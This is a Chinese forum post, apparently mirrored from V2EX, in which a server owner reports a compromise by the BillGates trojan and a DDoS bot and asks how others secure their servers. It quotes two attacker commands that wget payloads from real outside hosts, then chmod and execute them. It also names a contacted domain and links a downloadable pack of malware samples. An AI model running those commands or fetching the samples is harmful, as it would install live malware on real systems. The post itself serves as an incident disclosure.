10
人生第一次遇到服务器被入侵了,放了一个 DDOS 脚本进去,附病毒样本。
source link: https://www.v2ex.com/t/787350
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
今天下午收到腾讯云安全通知,通知服务器被入侵了,然后去腾讯云看了一下,的确被日了。
系统的 5 个文件全被一个名叫:Elf32.Trojan.BillGates.da的病毒感染了,分别是:
/usr/bin/ps
/usr/bin/lsof
/usr/bin/netstat
/usr/bin/bsd-port/getty
/usr/bin/.sshd
接着发现在 root 目录被下载了 3 个文件:20000 、conf.n 、Kabot,查了一下执行命令:
/bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
/bin/sh -c id;wget http://117.24.13.169:881/KaBot;chmod 777 KaBot;./KaBot
接着发现,这个木马向 www.id666.pw 这个地址发送请求,请求了 14 次。
想了一下是什么原因被入侵的,服务器没有发现被暴力破解,那屌毛也没有登陆服务器,提权也没发现,因为安全组入站只开放了 3000 这一个端口,出站没有限制任何流量。服务器上运行了 YApi 的程序,就是这个程序使用的 3000 端口,几乎可以排除是从 YApi Web 入侵的,因为 Web 只允许指定地区访问并且就只有两个城市加入了白名单,平时也是公司的人用,没有对外开放过。
截至被入侵前,服务器还有两个漏洞没处理,分别是:
- OpenSSH XMSS Key 解析整数溢出漏洞
- OpenSSL 拒绝服务漏洞(CVE-2021-3449)
所以也不能排除可能是因为这两个漏洞被日的,我把被感染的程序、病毒样本和木马文件打包了一下,有能力的大佬可以分析一下。
下载地址: https://ws28.cn/f/5tdnbv41qsg (只有 24 小时有效期)
因为服务器只有 YApi 一个程序和一个数据库,数据库有备份,YApi 可以重新下载。所以收到报警就直接重装了,不给这屌毛一丁点机会。
最后想问下大家平时都是怎么做安全的?这玩意防不胜防啊我丢!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK